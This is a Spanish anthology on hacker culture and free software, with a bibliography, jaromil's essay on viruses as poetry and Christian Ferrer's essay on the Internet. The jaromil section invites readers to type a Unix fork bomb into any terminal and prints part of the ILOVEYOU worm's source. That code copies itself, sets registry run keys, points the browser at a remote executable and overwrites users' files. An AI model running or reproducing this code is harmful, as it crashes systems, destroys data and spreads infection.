Page 457: Internet, hackers y software li   varios

Cyberpunk: outlaws and hackers on thecomputer frontier. London, Corgi Books,1993. Las historias de tres famososhackers: Kevin Mitnick, Pengo y RobertTappan Morris. Escrito con estiloperiodístico y centrado en el enfoquehumano, muy fácil de leer.

Douglas Hofstadter: Gödel, Escher,Bach: An eternal golden braid. Unclásico de culto entre científicos (yhackers). Hofstadter conectamatemáticas, música e imaginacionescon temas de Inteligencia Artificial [haytrad. cast.: Gödel, Escher, Bach: uneterno y grácil bucle. Barcelona,Tusquets, 1989].

Page 458: Internet, hackers y software li   varios

Tracy Kidder: The soul of a newmachine (Boston, Little-Brown, 1981).La historia de cómo Data Generaldesarrolló su primera minicomputadora.Captura el espíritu «Sociedad de losPoetas Muertos» del «hacking»cooperativo e intenso.

New Hacker´s Dictionary, editadopor Eric S. Raymond. El lenguaje es uncomponente fuerte de toda cultura. Sinexcepciones para la(s) cultura(s) hacker.Este diccionario es un clásico (http://www.hack.gr/jargon/ ).

[hay versión en papel: The NewHacker’s Dictionary. Cambridge, MITPress, 1996].

Page 459: Internet, hackers y software li   varios

Jörgen Nissen: Pojkarna vid datorn.Symposion Graduate, 1993. Una tesis dedoctorado de sociología en sueco sobrela cultura hacker de aficionados enSuecia.

Phrack (http://www.phrack.org/ ). Una

revista hacker histórica, publicada enforma gratuita desde 1985 a través deBBS´s y más recientemente por Internet.

Eric S. Raymond: The cathedral andthe bazaar (http://www.catb.org/~esr/writings/cathedral-

bazaar/ ). Un análisis de por quéfunciona el concepto de código abiertode Linux [hay trad. cast.: La catedral y el

Page 460: Internet, hackers y software li   varios

bazar,http://es.tldp.org/Otros/catedral-

bazar/cathedral-es-paper-

00.html#toc1/ ].«Homesteading the noosphere» (en

http://www.catb.org/~esr/writings/cathedral-

bazaar/ ). Un ensayo sobre propiedady pertenencia en la cultura de códigoabierto [hay trad. cast.: «Cultivando lanoosfera», enhttp://www.geocities.com/jagem/noosfera.html

].«The magic cauldron» (en

http://www.catb.org/~esr/writings/cathedral-

bazaar/ ). Sobre la economía delsoftware de código abierto [hay trad.

Page 461: Internet, hackers y software li   varios

cast.: «El caldero mágico», enhttp://www.alanta.info/MagicCauldron.html

].Howard Rheingold: Tools for

thought, 1985 (http://www.rheingold.com/texts/tft/

). Un buen texto sobre la historia dela(s) cultura(s) hacker, con énfasispuesto en el «hacking» académico enEE.UU. [hay versión en papel: Tools forthought: The History and Future ofMind-Expanding Technology.Cambridge, MIT Press, 2000].

Bruce Sterling: The hackercrackdown: law and disorder on theelectronic frontier (New York, Bantam

Page 462: Internet, hackers y software li   varios

Books, 1992). La historia de laOperación Sundevil, un intento a granescala de las autoridades de EE.UU de«combatir el delito informático» yencarcelar hackers. El libro se halladisponible en diversos formatos en laElectronic Frontier Foundation [haytrad. cast.: La caza de hackers,http://banners.noticiasdot.com/termometro/boletines/docs/consultoras/hackers/75-

Lacazade272621.pdf ].Clifford Stoll: The cuckoo´s egg

(New York, Doubleday, 1989).Describe la búsqueda de Stoll en pos deun hacker infiltrado en su sistema de losLaboratorios de Lawrence, Berkeley;una búsqueda que lo lleva hasta Europa

Page 463: Internet, hackers y software li   varios

del Este. El enfoque conspirativo dellibro de Stoll se equilibra con el relatode la misma historia que hacen Hafner yMarkoff (ver supra) [hay trad. cast.: Elhuevo del cuco. Barcelona, Planeta,1990].

Sherry Turkle: The second self(New York, Simon and Schuster, 1984).Un estudio psicológico de los hackers(entre otros grupos) y sus relaciones conlas computadoras [hay trad. cast.: Elsegundo yo: las computadoras y elespíritu humano. Buenos Aires,Galápago, 1984].

Linus Walleji: Copyright finns inte,version 3.0 (

Page 464: Internet, hackers y software li   varios

http://www.df.lth.se/~triad/book/

). El mejor texto en sueco sobre culturashacker que vi. Muy amplio; algunosmateriales sobre la historia de lasculturas hacker en Suecia son únicos[hay trad. inglesa: Copyright does notexist,http://svenskefaen.no/cdne/ ].

Page 465: Internet, hackers y software li   varios

Las aves marinas deNeruda

jaromil es un hacker italiano. Sedefine como amante de la libertad ydesarrollador de software, artista ymediactivista, performer yemigrante. En 2000 dio inicio alproyecto Dyne.org en el que participa uncolectivo de programadores para crearuna versión portátil del sistema Linux.Otros proramas que impulsa son MuSe,HasciiCam y FreeJ. Para másinformación puede visitarse su página enhttp://www.rastasoft.org/ .

«Las aves marinas de Neruda» fuepublicado por jaromil en su página web

Page 466: Internet, hackers y software li   varios

en octubre de 2001.«:(){ :|:& };:» es la nota de

presentación para la muestra sobre virusinformáticos «I Love You» , en elMuseo de Artes Aplicadas, Frankfurt,Alemania, 2002.

1. PRELUDIO

«La destruction de la conscienceindividuelle représente pourtant unehaute idée de culture, c’est une idéeprofonde de la culture d’ou dérive uneforme toute nouvelle de civilisation. Nepas se sentir vivre en tant qu’individu

Page 467: Internet, hackers y software li   varios

revient à échapper à cette formeredoutable du capitalisme que moi,j’appelle le capitalisme de laconscience puisque l’âme c’est le biende tous.» [89]

Antonin Artaud, «Messagesrévolutionnaires»

3 de junio de 1936.

2. PANORAMA

2.1 horizontalidad y red

El crecimiento de la red hizo que se

Page 468: Internet, hackers y software li   varios

hiciera todavía más factible laalternativa no-propietaria.[90] Lo que anivel popular y académico se nombracomo una cosa la Internet en realidad esuna condición social: el hecho de que enla sociedad red todos están conectadosdirectamente, sin intermediarios, a todoslos demás. La interconexión global delas redes eliminó el cuello de botellaque obligaba a que en la era de losmainframes[91] un fabricante de softwarecentralizado regulara y distribuyera losproductos de la innovación individual.

2.2 libertad inherente a los flujos debits

Page 469: Internet, hackers y software li   varios

El software —ya sean programasejecutables, música, arte visual, poesía,armamento, o lo que sea— consiste enflujos de bits, que de manerabásicamente indistinta son sometidos auna confusa multiplicidad de categoríaslegales. Esta multiplicidad es inestable alargo plazo por razones inherentes a losprocedimientos legales. La inestabilidadde las normas se origina en la necesidadde diferenciar distintos intereses yderechos de propiedad respecto de losflujos de bits. Esta necesidad la padecenfundamentalmente aquellos que esperanbeneficiarse con las formas socialmenteaceptadas de monopolio derivadas de

Page 470: Internet, hackers y software li   varios

tratar a las ideas como propiedadprivada. Aquellos de nosotros que nosinquietamos por la inequidad social y lahegemonía cultural generadas por esterégimen intelectualmente insatisfactorioy moralmente repudiable provocamosgritos de escándalo. Los que nos gritan anosotros creen que estas leyes depropiedad son necesarias no por ciertodeseo manifiesto de vivir en elMurdochworld[92] —aunque un poco decooptación nunca está de más—, sinoporque pretenden demostrar con lametáfora de los incentivos —que ellostoman no como simple metáfora sinocomo argumento— que estas leyes —a

Page 471: Internet, hackers y software li   varios

pesar de sus lamentables consecuencias— son imprescindibles para crearsoftware de calidad. La única forma deseguir sosteniendo esto es ignorando loshechos. En el corazón de la revolucióndigital, en los flujos de bits de losprogramas ejecutables que hacenposible que todo lo demás funcione, losregímenes de propiedad no sólo nomejoran las cosas, pueden empeorarlasterriblemente.

2.3 derechos de autor vs. progreso

Las nociones de propiedad, ademásde lo que tengan de malo, no alientan el

Page 472: Internet, hackers y software li   varios

progreso y de hecho lo han retardado.En la sociedad red el anarquismo (o,mejor dicho, el individualismo anti-posesivo) es una filosofía políticaviable. Uno de los problemasprincipales del anarquismo comosistema social radica en los costos detransacción. Pero la revolución digitalcambia dos aspectos de la economíapolítica que han permanecidoinvariables a lo largo de la historiahumana. Todo el software posee uncosto marginal cero en el mundo de laRed, mientras que los costos decoordinación social se han reducido alpunto de permitir la rápida formación y

Page 473: Internet, hackers y software li   varios

disolución de agrupamientos socialesenteros, a gran escala y con grandiversidad, sin limitaciones geográficas.

3. IDENTIDAD

1 algunas dudas íntimas

(tomado de un ensayo de JonathanAlex Gold)

Hasta ahora yo pensaba que era uncientífico. Yo pensaba que era unfilósofo; un matemático, que estudiabalos algoritmos y sus demostraciones en

Page 474: Internet, hackers y software li   varios

la gran tradición de Euclides y Gauss y,por supuesto, al-Khwarizimi. Hubierajurado que esto era lo que hacía. Pero,por lo que me llega de las noticias, y porlo que la gente me dice acerca de mí, nose trata de eso.

Resulta que soy un ingeniero de laola punto com. Me quedé sin hablacuando me enteré. Contra lo que yopensaba que hacía, en realidad estabaocupado en diseñar algo así como elnuevo mundo-ciberinter-web de latecnología de mañana del presente delfuturo. Si te incomoda el hecho de queesta frase no te sugiera ningún sentido, teentiendo. De hecho, parece que yo me

Page 475: Internet, hackers y software li   varios

encargo de crearlo, y ni siquiera sé loque es.

Encima de esto, parece que si noestoy ocupado, generando la tecnologíade mañana, hoy, estoy trabajando sinparar toda la noche en un pequeñocuarto sin ventanas, bebiendo litros decafé y persiguiendo mi sueño deconvertirme en el nuevo Bill Gates; enel nuevo joven brillante as de lascomputadores que revoluciona lainternet con sistemas á la Napster, listopara dar el salto con un software escritoen mi garage para llegar a la cima de unnuevo imperio, donde por mi cuenta y enbuena ley de tareas en paralelo dejo

Page 476: Internet, hackers y software li   varios

muertas a las damas con mi saber sobreel esquema cliente-servidor mientrasseduzco a bancos y difusos fondos deinversión para que entren a mi guaridade posters de Calabozos y Dragones y asalas de chat donde los convenzo con mihistorieta superdigitalizada para quelarguen sus billetes con la promesa de lanueva gran I.P.O [93] que va a reventar elNasdaq y ser la sensación. Ysimultáneamente planeo meterme en sussistemas de seguridad para de ahíacceder al Departamento de Estado enun plan delirante de hacker perdido yalucinado para anotar a Mickey Mousecomo enviado de la seguridad nacional

Page 477: Internet, hackers y software li   varios

en Pakistán. No tenía idea de que estabatan ocupado y metido en esto.

Ya me cansé, sólo de leer sobre mí.Perdí el dominio de mi identidad.

Parece que ahora le pertenece aMicrosoft y Ebay, a Time y Newsweek,a Dateline e Intel. Trato de recordar siacaso se la vendí a ellas y después meolvidé. He revisado mi alma en busca dealguna señal de la operación, algúnrecibo de venta, y no puedo encontrarnada. He estado tratando de recordaralgún momento en particular en quequizás haya ocurrido algún malentendidoy este tipo de empresas hayan empezadoa creer que son las dueñas de mi

Page 478: Internet, hackers y software li   varios

identidad.

4. CANTO

En la costa de Chile donde vivía Nerudatodos saben quelas aves marinas suelen robar cartas

de los buzonesque les gustaría leer por varias

razones¿Debo enumerar las razones?son muy evidentesincluso a pesar del silencio de los

pájaros sobre el tema (salvo cuando

Page 479: Internet, hackers y software li   varios

hablan de ello entre sí con gritos)Antes que nadaroban las cartas porquesienten que el Canto Generalde las palabras de todos ocultoen las cartas debe contener

ciertamente las llavesdel corazón mismo de la humanidadque los pájaros por su cuentanunca han podido sondear(albergan grandes dudas, de hecho,de que en realidad existancorazones dentro de los hombres)Y entonces estos pájaros tienen otra

sensación,de que su propio Canto General

Page 480: Internet, hackers y software li   varios

podría de alguna maneraenriquecerse

con estos extraños gritos de loshombres

(Qué rara idea de mente de pájaroque nuestros gorjeos podrían

iluminarlos)Pero cuando robaron y huyeron con

las cartas de Nerudade su buzón en Isla Negraestaban de hecho robando su propio

Canto Generalque él había recogido originalmente

de ellos de su vasta visión omnívora yextasiante.

Pero ahora que Neruda está muerto

Page 481: Internet, hackers y software li   varios

no se escriben más aquellas cartasy deben tocar de oído otra vezla canción grande y altaen el corazón de nuestra sangre y

silencio.Lawrence Ferlinghetti Cuernavaca,

26 de octubre de 1975

Page 482: Internet, hackers y software li   varios

:(){ :|:& };:

Preludio

Cualquier discusión sobre elsoftware como arte debe tener en cuentatodo el proceso creativo vinculado a suconcepción y realización, o cual lleva auna nueva operabilidad dentro deldominio digital: nuestra atención estápuesta aquí en los códigos fuentes,[94] elfascinante mundo del álgebra y de losalgoritmos que se puede observar en

Page 483: Internet, hackers y software li   varios

muchas expresiones de forma dentro dela inmanencia digital, todas las cualespueden reformularse y producir sentido.

Los códigos fuentes, o mejor losalgoritmos y el álgebra, son lasherramientas del artesano digital de laedad moderna con más de mil años deteorías matemáticas por detrás;[95] sólopor poco más de un cuarto de siglo hanactuado como software. El software esun medio para crear arte y comunicar.Es una metaliteratura que define de quémanera pueden transportarse y(re)producirse sentidos al multiplicarlas posibilidades de su comunicación.En tanto medio de metacomunicación, el

Page 484: Internet, hackers y software li   varios

software representa a la Parole [habla](citando a Saussure), que deriva suejecución de una Langue [lengua], porejemplo del universo lingüístico ygramatical del código. El ejerciciometafísico se torna recursivo aquí:aunque muchos ven al código fuente sólocomo un oscuro criptograma, éste poseeun efecto indirecto en el modo en quenos comunicamos y aún más en laeficacia con la que lo hacemos.

Con todo esto en mente, ahoracentrémonos en el fenómeno de losprogramas conocidos como virus. Éstosconsisten en una combinación de actospoéticos de rebelión, síntomas políticos

Page 485: Internet, hackers y software li   varios

y estructurales, intentos de acceder a lasfisuras de la red explorando supermeabilidad; inteligencias artificiales(rara vez dañinas, aclarémoslo), que hanpoblado el universo digital desde susinicios.

Bohemia Digital

Al considerar al código fuente comoliteratura, estoy retratando los virusc o m o poesía maldita, comoprovocación contra aquellos que vendenla red como una zona liberada para la

Page 486: Internet, hackers y software li   varios

sociedad burguesa. Las relaciones,fuerzas y leyes que gobiernan el dominiodigital difieren de las del mundo natural.El dominio digital produce una forma decaos a veces incómoda por lo inusitada,aunque productiva dentro de la cualsurfear: en ese caos los virus soncomposiciones espontáneas, líricas porprovocar imperfecciones en máquinashechas para funcionar y por representarla rebelión de nuestros siervos digitales.

Podría parecer que esta idea decomparar los virus con poesía líricasólo la pueden apreciar aquellos quecuentan con conocimientos técnicosespecíficos, pero esto no es así. De

Page 487: Internet, hackers y software li   varios

hecho, este es uno de los propósitos dela exhibición I Love You dedigitalcraft.org, que explora losaspectos tantas veces negados de unabohemia digital. Ésta logra que la redpor la que hoy navegamos sea másorgánica, al diseñar nuevos modos decirculación para que la informaciónviaje en ella, a la vez que genera unaestética, en el verdadero sentido de lapalabra, que muchas veces hapermeando en el llamado net-art. Elcaos:

El último acto posible es el quedefine a la percepción misma, un cordóndorado invisible que nos conecta: fiestas

Page 488: Internet, hackers y software li   varios

ilegales en los pasillos del Palacio deJusticia. Si te fuera a besar aquí diríanque es un acto de terrorismo así quellevemos nuestros revólveres a la camay a medianoche despertemos a la ciudadcomo bandidos borrachos, celebrando alos tiros el mensaje del sabor del caos.

Hakim Bey Ahora tipea :(){ :|:& };:en cualquier terminal UNIX.[96]

Anticuerpos de Internet

Así como un organismo se defiendea sí mismo contra las enfermedades que

Page 489: Internet, hackers y software li   varios

lo infectan, la red ha reaccionadoproduciendo anticuerpos que atacan losbugs[97] de distintos tipos de softwaredefectuoso. Un tipo particular de virusque se difundió últimamente es elgusano, que se transmite básicamente através de programas de e-mail yservidores. Los fabricantes de softwarevulnerable siguen tratando de mejorar laseguridad de sus productos, lo que paranosotros quiere decir la privacidad denuestras comunicaciones.

En sentido político, vemos que lareacción de muchos escritores de virus,que se destacan en la red por suconocimiento profundo de los elementos

Page 490: Internet, hackers y software li   varios

que componen a ésta, fue precisamenteprovocada por el abordaje monopolistay corporativo de ciertos grandes gruposdel mercado que sueñan con convertir lared en un shopping virtual para suspropios modos de hacer negocios, sinrespeto por la horizontalidad de lasrelaciones de los ciudadanos que lahabitan. Hasta ahora ha habido infinidadde intentos de disminuir la velocidad ala que puede circular la información,que van desde la censura a lasrestricciones de copyright, con elobjetivo claro de centralizar susflujos:[98]

Page 491: Internet, hackers y software li   varios

Desde los primeros días de lacomputadora personal, elciberespacio fue visto como unmedio para recuperar espaciospúblicos ante su progresivadesaparición. Lee Felsenstein, unode los creadores de la computadorapersonal, impulsaba el uso de estaherramienta para reestablecer unsentido comunitario de lainformación (Felsenstein).Felsenstein y muchos de sus amigospioneros soñaron que la Internetpudiera brindarle a un vastopúblico un espacio que reflejarasus diversos intereses y

Page 492: Internet, hackers y software li   varios

promoviera la creatividad y lalibertad de expresión.

Por muchos años el discursomasivo encasilló a la Internet comouna zona de diversidad y libreexpresión donde cualquiera puedeser un creador. Pero desde losprimeros días de la Web, las áreaspúblicas de la Internet empezaron arodearse de vallas, cada vez más.En 1994 este autor advirtió sobree l efecto colonizador que losintereses comerciales tendrían en elespacio público que por entoncesrepresentaba Internet (Besser,1994). Y en 1995, discutió sobre

Page 493: Internet, hackers y software li   varios

cómo el control por parte degrandes industrias pasaría porencima de los beneficios públicosy la diversidad que la Internethabía prometido. Casi una décadamás tarde, vemos cada vez másvallados los espacios de Internet, ylas acciones de las personas cadavez más rastreadas y almacenadas.

Howard Besser

Los virus son un síntoma político deuna comunidad que sigue siendoextremadamente vasta, y su prohibiciónno soluciona los problemas que sederivan de ellos. Lo mismo es cierto

Page 494: Internet, hackers y software li   varios

respecto del hacking y el anonimato.

Rizografía

Un escritor de virus está interesadoen explorar la permeabilidad de la red.Un rizoma como el de Internet con tantasdimensiones, y con dimensiones de estetipo, no se puede representar en ningúnmapa; muchos lo intentaron pero hastaahora ninguno lo logró. Sus extensionespodrían delinearse siguiendo una ruta,sondeando dónde se bifurca, ypersiguiendo sus direcciones y

Page 495: Internet, hackers y software li   varios

conexiones. Al inyectar un mediocontrastivo en el organismo para trazarsu forma y estructura se producirá unangiograma que mostrará laconfiguración básica de sus venas. Sóloqueda hacer un esfuerzo y considerar losorígenes del Instinto de Exploración talcomo se presenta en nuestra propiahistoria, la historia del mundo orgánicotal como lo conocemos.

Quisiera agradecer a digitalcraft.orgpor su atención e interés en nuestrotrabajo. Ha sido un honor para mícontribuir con esta experiencia colectivapor la cual se ha mostrado tantoentusiasmo. Muchas gracias a Franziska

Page 496: Internet, hackers y software li   varios

Nori, Florian Cramer, AndreasBroeckmann, Alessandro Ludovico,Garderobe23 / Kunstfabrik Berlin,Woessel; en solidaridad con todos losque aún resisten. Para todos los quesiguen peleando: ¡no se detengan!

(Nota de Presentación para lamuestra I Love You sobre virusinformáticos, Museo de ArtesAplicadas, Frankfurt, 2002)

Copyleft 2002 (http://korova.dyne.org/ ) Sepermite copiar, distribuir,y/o modificar este documentobajo los términos de laLicencia de Documentación

Page 497: Internet, hackers y software li   varios

Libre GNU, Versión 1.1 ocualquier versión posteriorpublicada por la FreeSoftware Foundation;permaneciendo invariantestodas las secciones. Seconcede permiso para hacer ydistribuir copias de estedocumento mientras esta notase mantenga en todas lascopias.

I Love You

Este es un extracto con las primeraslíneas del código fuente del virus«I love

Page 498: Internet, hackers y software li   varios

you» , que infectó a millones decomputadores poco después de suaparición el 4 de mayo de 2000.

rem barok -

loveletter(vbe) <i hate go

to school>

rem by: spyder /

[email protected] /

@GRAMMERSoft Group /

Manila,Philippines

On Error Resume Next

dim

fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow

eq=””

ctr=0

Page 499: Internet, hackers y software li   varios

Set fso =

CreateObject(“Scripting.FileSystemObject”)

set file =

fso.OpenTextFile(WScript.ScriptFullname,1)

vbscopy=file.ReadAll

main()

sub main()

On Error Resume Next

dim wscr,rr

set

wscr=CreateObject(“WScript.Shell”)

rr=wscr.RegRead(“HKEY_CURRENT_USER\Software\Microsoft\Windows

Scripting

Host\Settings\Timeout”)

if (rr>=1) then

wscr.RegWrite

Page 500: Internet, hackers y software li   varios

“HKEY_CURRENT_USER\Software\Microsoft\Windows

Scripting

Host\Settings\Timeout”,0,”REG_DWORD”

end if

Set dirwin =

fso.GetSpecialFolder(0)

Set dirsystem =

fso.GetSpecialFolder(1)

Set dirtemp =

fso.GetSpecialFolder(2)

Set c =

fso.GetFile(WScript.ScriptFullName)

c.Copy(dirsystem&”\MSKernel32.vbs”)

c.Copy(dirwin&”\Win32DLL.vbs”)

c.Copy(dirsystem&”\LOVE-

LETTER-FOR-YOU.TXT.vbs”)

Page 501: Internet, hackers y software li   varios

regruns()

html()

spreadtoemail()

listadriv()

end sub

sub regruns()

On Error Resume Next

Dim num,downread

regcreate

“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32

“,dirsystem&”\MSKernel32.vbs”

regcreate

“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi

n32DLL”,dirwin&”\Win32DLL.vbs”

downread=””

downread=regget(“HKEY_CURRENT_USER\Software\Microsoft\Internet

Page 502: Internet, hackers y software li   varios

Explorer\Download

Directory”)

if (downread=””) then

downread=”c:\”

end if

if

(fileexist(dirsystem&”\WinFAT32.exe”)=1)

then

Randomize

num = Int((4 * Rnd) +

1)

if num = 1 then

regcreate

“HKCU\Software\Microsoft\Internet

Explorer\Main\Start

Page”,”http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj

Page 503: Internet, hackers y software li   varios

w6587345gvsdf7679njbvYT/WIN-

BUGSFIX.exe”

elseif num = 2 then

regcreate

“HKCU\Software\Microsoft\Internet

Explorer\Main\Start

Page”,”http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe

546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-

BUGSFIX.exe”

elseif num = 3 then

regcreate

“HKCU\Software\Microsoft\Internet

Explorer\Main\Start

Page”,”http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm

POhfgER67b3Vbvg/WIN-

BUGSFIX.exe”

Page 504: Internet, hackers y software li   varios

elseif num = 4 then

regcreate

“HKCU\Software\Microsoft\Internet

Explorer\Main\Start

Page”,”http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh

YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-

BUGSFIX

.exe”

end if

end if

if

(fileexist(downread&”\WIN-

BUGSFIX.exe”)=0) then

regcreate

“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-

BUGSFI

Page 505: Internet, hackers y software li   varios

X”,downread&”\WIN-

BUGSFIX.exe”

regcreate

“HKEY_CURRENT_USER\Software\Microsoft\Internet

Explorer\Main\Start

Page”,”about:blank”

end if

end sub

sub listadriv

On Error Resume Next

Dim d,dc,s

Set dc = fso.Drives

For Each d in dc

If d.DriveType = 2 or

d.DriveType=3 Then

folderlist(d.path&”\”)

Page 506: Internet, hackers y software li   varios

end if

Next

listadriv = s

end sub

sub

infectfiles(folderspec)

On Error Resume Next

dim

f,f1,fc,ext,ap,mircfname,s,bname,mp3

set f =

fso.GetFolder(folderspec)

set fc = f.Files

for each f1 in fc

ext=fso.GetExtensionName(f1.path)

ext=lcase(ext)

s=lcase(f1.name)

Page 507: Internet, hackers y software li   varios

if (ext=”vbs”) or

(ext=”vbe”) then

set

ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

elseif(ext=”js”) or

(ext=”jse”) or (ext=”css”)

or (ext=”wsh”) or

(ext=”sct”)

or (ext=”hta”) then

set

ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

bname=fso.GetBaseName(f1.path)

Page 508: Internet, hackers y software li   varios

set

cop=fso.GetFile(f1.path)

cop.copy(folderspec&”\”&bname&”.vbs”)

fso.DeleteFile(f1.path)

elseif(ext=”jpg”) or

(ext=”jpeg”) then

set

ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

Page 509: Internet, hackers y software li   varios

TECNOLOGÍAS

Page 510: Internet, hackers y software li   varios

Medio Mundo. Unidentikit

Christian Ferrer es ensayista ysociólogo. Enseña Filosofía de laTécnica en la Facultad de CienciasSociales de la Universidad de BuenosAires. Integró los grupos editores de lasrevistas Utopía, Farenheit 450, La Caja yLa Letra A. Actualmente integra los delas revistas El Ojo Mocho y Artefacto.Ha escrito los libros El lenguajelibertario (compilador) y Mal de Ojo:ensayo sobre la violencia técnica, asícomo Prosa plebeya, recopilación deensayos del poeta Néstor Perlongher, yLírica social amarga, compilación de

Page 511: Internet, hackers y software li   varios

escritos inéditos de Ezequiel MartínezEstrada. Su último libro es Cabezas detormenta: ensayos sobre loingobernable.

ASPECTO. ¿Se parece a una red?¿O a un laberinto, según una metáforatrillada? ¿Quizás a esas circunferenciasque organizan el tiempo y el espacio delos seres humanos? ¿Es el fantasma deun centro de vigilancia y control que sedeshilvana y recompone en millones depantallas? ¿O es el mapa fractal de unastrólogo del inconsciente? ¿O se parecea un conmutador telefónico, imagen queparece condensar su ideal de sociedad?¿A la vieja red ferrocarrilera o al delta

Page 512: Internet, hackers y software li   varios

de nervaduras del cuerpo humano? ¿Alorganigrama de una gran corporación?O a un mandala, esa figura orientalcuyos cuatro lados son simétricos y dedonde se sale y se ingresa por cualquierparte.

FECHA DE NACIMIENTO.¿Cuándo comenzó? ¿En los años ‘90, alesparcirse la hilatura informática por loscuatro puntos cardinales? ¿En 1981,cuando se lanzan al mercado lasprimeras computadoras personales? ¿En1946, cuando por primera vez ronroneanlas válvulas y circuitos de la gigantescaENIAC? ¿O fue en el siglo anterior,cuando Babbage inventó las tarjetas

Page 513: Internet, hackers y software li   varios

perforadas? ¿O quizás en el siglo XVIII,cuando de la palabra comunicación sedescartaron las connotaciones religiosasque evidenciaban comunidades encomunión a la vez que las ciudadesalcanzaban el millón de habitantes y sehacía necesario informar a unos sobre loque otros hacían en el extremo opuestodel mismo hábitat? ¿O quizás, incluso,algunos siglos antes, en el momento enque comenzaron a clasificarse los pecesque nunca nadie jamás comió o lasestrellas a donde nadie jamás viajó,potenciando así una indetenible voluntadde tratar la riqueza de la realidad comoinformación? No, Internet no es un

Page 514: Internet, hackers y software li   varios

dispositivo de última generación, comocreen los taquicárdicos y losdesinformados: es una idea que vienedesplegándose lenta peroimperiosamente desde hace siglos.

¿Cómo no darse cuenta de que fuenecesario, antes que nada, orientar elsentido de la vista hacia aparatostécnicos de captura de representacionesvisuales, y transformar al habitanteurbano en un observador incesantereactivando instantáneamente antecientos, o miles, de estímulos visualesen cada caminata, y acostumbrarlo a lapresencia continua, en ámbitosdomésticos y públicos, de cientos de

Page 515: Internet, hackers y software li   varios

juguetes ópticos de los teatros desombras a la linterna mágica, ydesplazar el significado de la palabraconfort desde la práctica íntima de laconfortación del alma a la comodidadhogareña apuntalada por tecnologías, yhacer que datos, imágenes y textos secruzaran primordialmente con flujos decapital, y que los futuros imaginadosincorporaran efectos especiales, y eso aescala mundial, y sin olvidar que elvalor de la aceleración fue elevado arango metafísico? Sí, ha sido necesaria,a lo largo de dos siglos, una inmensaacumulación de transformacionessubjetivas, políticas, económicas y

Page 516: Internet, hackers y software li   varios

tecnológicas para que en los años ‘90cualquiera pudiera estar cierto que haymás verdad en Internet de la que habíaen la televisión, y antes, en el cine, yantes, en los textos de lectura, y muchoantes, en los relatos orales quetransmitían historias de dioses yanimales mitológicos.

MEDIDAS. Decir que es unavoluntad de poder es definir a Internet.Un improbable viajero espacial queescrutara el planeta Tierra con sutelescopio, seguramente observaría ladanza orbital de cien satélitesartificiales de comunicación vigilando,articulando e intercronometrando las

Page 517: Internet, hackers y software li   varios

actividades humanas; observaría ademásel titilar de millones de computadoraslocalizables como alfileres coloreadosen el mapa de un estado mayor de lainteligencia estatal; y también a flujosinmensurables de dinero pulsando a lolargo de la red; y observaría una dúctilinterconexión de redes telefónicas,televisivas e informáticas; y asimismoobservaría cientos de miles demicroemprendimientos destinados amantener el flujo sanguíneo en lasinnúmeras nervaduras tal cual estacionesde servicio a lo largo de una carretera;y, si abriera aún más al gran angular,observaría como este medio mundo de

Page 518: Internet, hackers y software li   varios

pescador acoge y arrastra a lasactividades humanas más pujantes y lasencastra en un todo funcional.

Observaría, en definitiva, a unsistema guerrero en marcha, unaauténtica voluntad de poder que reciénestá en su curva de ascenso, cuyasequivalencias pueden ser encontradas enla expansión del Imperio Romano, laevangelización cristiana o la conquistade América.

Tal voluntad, además, envía a suocaso a toda labor humana que no seadecue a sus exigencias y necesidades.Sólo subsisten el bien de museo, elanacronismo viviente o la costumbre

Page 519: Internet, hackers y software li   varios

inofensiva. No, Internet no es solamenteun entretenimiento para adolescentes, uninstrumento laboral, un medio decomunicación o un nuevo espacioempresarial. Es, además, un arma deinstrucción militar masiva, y la laptop,la PC, el mouse, el modem y el tecladoconstituyen el arsenal cotidiano degladiadores bonachones.

GRUPO SANGUINEO. Y comocada cosa tiene su doblez, también lared tiene una zona secreta, y vericuetospor donde se filtran líquidoscontaminantes que el artefacto en símismo produce. Delito informático,virus, espionaje, ataques concertados a

Page 520: Internet, hackers y software li   varios

una sección de la red, todo ellopertenece a la segunda categoría y sonequivalentes a lo que la delincuencia, elsabotaje, el espionaje industrial y elpartisanismo político eran al ordenproductivo clásico. Después de todo, laforma de la red imita al serpentario.

En efecto, la palabra virus significa,en latín, veneno, y el daño nihilista o lasactividades que redundan en hurto nodejan de ser la ineliminable enfermedadvenérea de Internet, su mal denacimiento, su falla de fábrica. Delmismo modo, el accidente de transito esinerradicable de la autopista. Encambio, la vigilancia oculta de los

Page 521: Internet, hackers y software li   varios

usuarios por parte desupercomputadoras ocultas es harina deotro costal.

La existencia de la así llamada redEchelon demuestra que la voluntad decontrol de los Estados modernos y lacultura del secreto que desde siempre hasignado a los servicios de inteligenciaestatales se han adosado a la red comoel injerto al árbol. Esassupercomputadoras operan como unaesponja, dejando escurrir solo el líquidoinsignificante a la vez que setransforman en una suerte deinconsciente de la red, remedo del egototalitario de las potencias del primer

Page 522: Internet, hackers y software li   varios

mundo. El año 2000 encontró a losinternautas unidos y vigilados, y no lesqueda otro remedio que repensarpolíticamente las promesas libertariascon que se publicitó el despliegue deInternet.

PROFESION. La red reciéncomienza a desplegar sus fuerzas. Suspróximos pasos están garantizados, engran medida porque Internet ya habita laimaginación contemporánea como unprodigio en el que estarían contenidasindecibles posibilidades, pero tambiénporque resulta ser un cauce amable paralos viejos problemas irresueltos de lahumanidad. Una página WEB hace

Page 523: Internet, hackers y software li   varios

resaltar el deseo de reconocimientofrustrado; el sitio pornográfico revela lavieja insatisfacción sexual; y en cadachat se fuga de la soledad. Y asísucesivamente, duplicándose en elciberespacio nuestra forma de existenciaterrenal.

